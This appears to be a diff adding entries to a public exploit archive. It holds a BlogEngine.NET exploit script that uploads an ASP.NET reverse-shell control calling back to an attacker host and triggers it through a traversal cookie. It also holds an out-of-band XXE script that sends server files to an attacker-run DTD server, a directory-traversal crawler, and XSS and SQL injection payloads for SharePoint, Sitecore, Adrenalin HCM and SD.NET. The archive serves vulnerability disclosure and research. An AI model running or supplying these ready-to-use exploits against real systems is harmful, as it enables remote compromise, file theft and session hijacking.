#Content-Disposition: form-data; filename="PostView.ascx"
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
# protected override void OnLoad(EventArgs e) {
# base.OnLoad(e);
#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);
#StringBuilder strInput = new StringBuilder();
#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();
#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
# } } } } }
# private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
# StringBuilder strOutput = new StringBuilder();
# if (!String.IsNullOrEmpty(outLine.Data)) {
# try {
# strOutput.Append(outLine.Data);
# streamWriter.WriteLine(strOutput);
# streamWriter.Flush();
#} catch (Exception err) { }
# }
# }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE.
=================================
import argparse
import io
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, params={}, data={}, files={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=params)
elif method == 'POST':
if files:
r = requests.Request(method, target, files=files)
else:
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
def upload_shell(session, target, listener):
try:
lhost, lport = listener.split(':')
except:
print(target, " is not in the correct HOST:PORT format")
sys.exit(1)
shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
make_request(session, "POST", target + "/api/upload?action=filemgr", files={"file": ("PostView.ascx", shell, "application/octet-stream")})
def trigger_shell(session, target):
import datetime
now = datetime.datetime.now().strftime("%Y/%m/")
requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)})
def main(target, user, passwd, listener):
with requests.Session() as session:
login(session, target, user, passwd)
upload_shell(session, target, listener)
trigger_shell(session, target)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
main(protocol + args.target, args.user, args.passwd, args.listener)

190
exploits/aspx/webapps/47014.py Executable file
View file

@ -0,0 +1,190 @@
# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
# Date: 19 June 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10718
#1. Description
#==============
#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
#Injection attack on **/pingback.axd**.
#2. Proof of Concept
#=============
#Host the following malicious DTD on a web server that is accessible to the
#target system:
#~~~
#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
#~~~
#Submit a request to `pingback.axd` containing a malicious XML body:
#~~~{command="REQUEST"}
#POST /pingback.axd HTTP/1.1
#Host: $RHOST
#Accept-Encoding: gzip, deflate
#Connection: close
#User-Agent: python-requests/2.12.4
#Accept: */*
#Content-Type: text/xml
#Content-Length: 131
#<?xml version="1.0"?>
#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
#<foo>&e1;</foo>
#<methodName>pingback.ping</methodName>
#~~~
#The application will request the remote DTD and submit a subsequent request
#containing the contents of the file:
#~~~
#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
#$RHOST - - [17/May/2019 12:03:32] "GET
#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
#HTTP/1.1" 200 -
#~~~
#! /usr/bin/env python3
import argparse
import http.server
import json
import multiprocessing
import os
import re
import requests
import sys
import time
import urllib
"""
Exploit for CVE-2019-10718
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Submit a XML to the target, get the contents of the file in a follow up request from the target
python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt
Requesting C:/Windows/win.ini ...
$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -
Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config
Requesting C:/inetpub/wwwroot/iisstart.htm ...
$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/inetpub/wwwroot/iisstart.htm
Requesting C:/Windows/iis.log ...
$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Windows/iis.log
Requesting C:/Users/Public/test.txt ...
$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -
"""
xml = """<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>
"""
dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2;
"""
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
file_queue = multiprocessing.Queue()
response_queue = multiprocessing.Queue()
response_counter = multiprocessing.Value('i', 0)
class S(http.server.SimpleHTTPRequestHandler):
server_version = 'A Patchey Webserver'
sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
error_message_format = 'Donde esta la biblioteca?'
def _set_headers(self):
self.send_response(200)
self.send_header('Content-Type', 'application/xml')
self.end_headers()
def do_GET(self):
if self.path.endswith(".dtd"):
self._set_headers()
self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
elif self.path.startswith("/X"):
self._set_headers()
response_counter.value += 1
response_queue.put(self.path)
self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
else:
self._set_headers()
self.wfile.write('<error>?</error>')
def start_server(lhost, lport, server):
httpd = http.server.HTTPServer((lhost, lport), server)
httpd.serve_forever()
def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
print(output_dir)
if not output_dir:
return
for f in files:
file_queue.put_nowait(f)
server = S
server.lhost, server.lport = lhost, lport
p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
p.start()
for num, f in enumerate(files):
print("\nRequesting {} ...".format(f))
count = 0
r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
response = True
while num == response_counter.value:
if count >= timeout:
response = False
response_counter.value += 1
print("Unable to read {}".format(f))
break
time.sleep(1)
count += 1
if response:
os.makedirs(output_dir, exist_ok=True)
with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
p.terminate()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory. Default ./CVE-2019-10718')
args = parser.parse_args()
if isinstance(args.files, str):
args.files = [args.files]
main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)

183
exploits/aspx/webapps/47035.py Executable file
View file

@ -0,0 +1,183 @@
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717
1. Description
==============
BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
2. Proof of Concept
=============
Log in to the application and submit a GET request to /api/filemanager:
Request:
~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~~
Depending on how the request is submitted, the response may be XML or JSON
XML Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030
<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
<FileInstance>
<Created>5/14/2019 6:58:46 PM</Created>
<FileSize></FileSize>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../..</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
...
~~~
JSON Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011
[
{
"IsChecked":false,
"SortOrder":0,
"Created":"5/14/2019 7:35:13 PM",
"Name":"...",
"FileSize":"",
"FileType":0,
"FullPath":"~/App_Data/files/../..",
"ImgPlaceholder":""
}
...
~~~
import argparse
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10717
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Outputs list of filenames found in web root
python exploit.py -t $RHOST
?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, data={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=data)
elif method == 'POST':
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), login_data)
def parse(body, path, outfile):
paths = json.loads(body)
new_paths = set()
for i in paths:
if i.get('FileType') == 0:
new_paths.add(i.get('FullPath'))
else:
outfile.write("{path}\n".format(path=i.get('FullPath')))
return new_paths
def traverse(session, host, paths, outfile, visited=set()):
paths = set(paths) - visited
for path in paths:
print path
outfile.write("\n?path={path}\n".format(path=path))
visited.add(path)
resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
new_paths = parse(resp, path, outfile)
if new_paths:
traverse(session, host, new_paths, outfile, visited)
def main(host, user, passwd, root, outfile):
with requests.Session() as s:
login(s, host, user, passwd)
traverse(s, host, root, outfile)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
if isinstance(args.root, str):
args.root = [args.root]
main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)

27
exploits/aspx/webapps/47106.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage: http://www.sitecore.net/en
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493
Vendor Description
------------------
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
1. Login to application and navigate to "https://example.com/sitecore/shell/Applications/Content Editor.aspx?sw_bw=1"
2. Go to media library and click on any image and edit it
3. Now in Extension input parameter inject any XSS vector like '"><svg=onload=prompt(2)>

177
exploits/aspx/webapps/47417.txt Normal file
View file

@ -0,0 +1,177 @@
# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
# Author: Davide Cioccia
# Discovery Date: 2019-09-25
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
# Tested Version: SP1
# Tested on: Microsoft Windows Server 2016
# CVE: CVE-2019-1262
# Advisory ID: ZSL-2019-5533
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
Vendor: Microsoft Corporation
Product web page: https://www.microsoft.com
Affected version: 2013 SP1
Summary: SharePoint is a web-based collaborative platform that
integrates with Microsoft Office. Launched in 2001, SharePoint
is primarily sold as a document management and storage system,
but the product is highly configurable and usage varies substantially
among organizations.
Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
SharePoint Server does not properly sanitize a specially crafted web
request to an affected SharePoint server. An authenticated attacker
could exploit the vulnerability by sending a specially crafted request
to an affected SharePoint server. The attacker who successfully exploited
the vulnerability could then perform cross-site scripting attacks on
affected systems and run script in the security context of the current
user. The attacks could allow the attacker to read content that the
attacker is not authorized to read, use the victim's identity to take
actions on the SharePoint site on behalf of the user, such as change
permissions and delete content, and inject malicious content in the
browser of the user.
Sharepoint 2013 SP1 allows users to upload files to the platform, but
does not correctly sanitize the filename when the files are listed. An
authenticated user that has the rights to upload files to the SharePoint
platform, is able to exploit a Stored Cross-Site Scripting vulnerability
in the filename. The filename is reflected in the attribute 'aria-label'
of the following HTML tag.
# PoC request:
POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
Host: vulnerable_sharepoint_2013
Connection: close
Content-Length: 31337
Cache-Control: max-age=0
Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
Origin: https://vulnerable_sharepoint_2013.tld
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: nested-navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
Cookie: ...
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_View"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
False
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_FilterString"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_Button"
none
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_Shared"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_InDesignMode"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__REQUESTDIGEST"
[DIGEST]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATE"
[VIEWSTATE]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
E6912F23
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONX"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONY"
0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTVALIDATION"
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="destination"
[DESTINATION_FOLDER]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
Content-Type: image/jpeg
ZSL
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
on
------WebKitFormBoundaryewNI1MC6qaHDB50n--

30
exploits/aspx/webapps/47589.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: SD.NET RIM 4.7.3c - 'idtyp' SQL Injection
# Date: 2019-11-05
# Exploit Author: Fabian Mosch (r-tec IT Security GmbH)
# Vendor Homepage: https://www.sitzungsdienst.net/
# Software Link: https://www.sitzungsdienst.net/2018/12/sd-net-rim-4-7-3-veroeffentlicht/
# Version: < 4.7.3c
# Tested on: < 4.7.3c
# CVE : N/A
# SD.NET RIM before version 4.7.3c is vulnerable to a SQL-Injection vulnerability. To Exploit the vulnerability
# an attacker has to inject arbitrary SQL Statements in the following POST parameters:
POST /vorlagen/?__=SOMEBASE64 HTTP/1.1
Host: VulnerableHost.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Origin: https://vulnerablehost.com
Connection: close
Referer: https://vulnerablehost.com/vorlagen/?__=BASE64
Cookie: PHPSESSID250=SESSIONID
Upgrade-Insecure-Requests: 1
reqid=f48de4c24ae1b72dd37ebde6f6b40544&nummer=t&idtyp=-1INJECTHERE&idgremium=-1INJECTHERE&datefrom=TT.MM.JJJJ&dateto=TT.MM.JJJJ&csrftoken=CSRFToken
# The attacker is then redirected with a 302 redirect to an URL /templates/?__=NEWBASE64 as GET request.
# By issuing the second request the arbitrary SQL-Statement gets executed.

43
exploits/aspx/webapps/47611.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12234
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
# URL
# ====================
https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155
Parameter
====================
strAction
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12234
https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

44
exploits/aspx/webapps/47613.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12650
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
URL
====================
https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
Parameter
====================
prntDDLCntrlName
prntFrmName
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12650
https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

45
exploits/aspx/webapps/47643.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple
